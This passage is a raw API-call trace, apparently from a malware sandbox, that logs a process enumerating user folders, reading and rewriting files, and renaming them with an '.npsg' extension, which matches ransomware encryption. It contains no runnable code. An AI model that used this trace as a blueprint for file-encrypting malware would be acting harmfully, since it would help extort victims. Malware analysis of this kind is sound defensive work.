hHeap=0x620000) returned 1 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0245.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0245.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89030 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890c0 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89030 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89000 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89048 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0245.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0245.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0245.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bc90 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0245.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0245.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0245.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890a8 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89090 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7a70 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0245.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0245.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0245.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0245.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0245.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0245.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0245.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0245.754] WriteFile (in: hFile=0x644, lpBuffer=0x3b99d50*, nNumberOfBytesToWrite=0x3a79, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b99d50*, lpNumberOfBytesWritten=0x39afb14*=0x3a79, lpOverlapped=0x0) returned 1 [0245.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b99d50 | out: hHeap=0x620000) returned 1 [0245.754] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x3a7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.754] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0245.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0245.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0245.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0245.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0245.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b8ccd0 [0245.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0245.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0245.755] WriteFile (in: hFile=0x644, lpBuffer=0x3b8ccd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b8ccd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0245.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.755] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0245.755] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0245.756] CloseHandle (hObject=0x644) returned 1 [0245.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0245.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e0) returned 0x3b8ccd0 [0245.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bce8 | out: hHeap=0x620000) returned 1 [0245.764] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\SGtgvmwElf ijI0mL.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\sgtgvmwelf iji0ml.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\SGtgvmwElf ijI0mL.odp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\sgtgvmwelf iji0ml.odp.npsg")) returned 1 [0245.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.765] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0245.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0245.767] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc588420, ftCreationTime.dwHighDateTime=0x1d5c10e, ftLastAccessTime.dwLowDateTime=0xc99ddfa0, ftLastAccessTime.dwHighDateTime=0x1d5c3c8, ftLastWriteTime.dwLowDateTime=0xc99ddfa0, ftLastWriteTime.dwHighDateTime=0x1d5c3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wX25LV54WV", cAlternateFileName="WX25LV~1")) returned 1 [0245.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0245.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8e00 [0245.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0245.767] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc588420, ftCreationTime.dwHighDateTime=0x1d5c10e, ftLastAccessTime.dwLowDateTime=0xc99ddfa0, ftLastAccessTime.dwHighDateTime=0x1d5c3c8, ftLastWriteTime.dwLowDateTime=0xc99ddfa0, ftLastWriteTime.dwHighDateTime=0x1d5c3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wX25LV54WV", cAlternateFileName="WX25LV~1")) returned 0 [0245.767] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0245.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0245.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0245.768] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0245.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0245.768] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0245.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0245.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.773] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\") returned="FVtB8RwkjP B1jt\\" [0245.773] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\") returned="arnu9pMGj4v\\" [0245.773] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\") returned="NRaXHt\\" [0245.773] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\") returned="2 M12KpqJt__Iy\\" [0245.773] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0245.773] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0245.773] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0245.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0245.773] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0245.773] PathFindFileNameW (pszPath="") returned="" [0245.773] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbe5f0b0, ftCreationTime.dwHighDateTime=0x1d5bac2, ftLastAccessTime.dwLowDateTime=0x437ebf00, ftLastAccessTime.dwHighDateTime=0x1d5b8bc, ftLastWriteTime.dwLowDateTime=0x437ebf00, ftLastWriteTime.dwHighDateTime=0x1d5b8bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0245.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0245.778] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbe5f0b0, ftCreationTime.dwHighDateTime=0x1d5bac2, ftLastAccessTime.dwLowDateTime=0x437ebf00, ftLastAccessTime.dwHighDateTime=0x1d5b8bc, ftLastWriteTime.dwLowDateTime=0x437ebf00, ftLastWriteTime.dwHighDateTime=0x1d5b8bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0245.778] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17e73210, ftCreationTime.dwHighDateTime=0x1d5b91f, ftLastAccessTime.dwLowDateTime=0xd46218a0, ftLastAccessTime.dwHighDateTime=0x1d5b682, ftLastWriteTime.dwLowDateTime=0xd46218a0, ftLastWriteTime.dwHighDateTime=0x1d5b682, nFileSizeHigh=0x0, nFileSizeLow=0x13426, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bJA8kVc76v-v6Q-z7wT-.swf", cAlternateFileName="BJA8KV~1.SWF")) returned 1 [0245.778] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\bJA8kVc76v-v6Q-z7wT-.swf") returned=".swf" [0245.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\bJA8kVc76v-v6Q-z7wT-.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\bja8kvc76v-v6q-z7wt-.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0245.778] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=78886) returned 1 [0245.779] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0245.781] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.781] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0245.783] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x13426, lpOverlapped=0x0) returned 1 [0245.784] lstrlenA (lpString="-----BEGIN PUBLIC 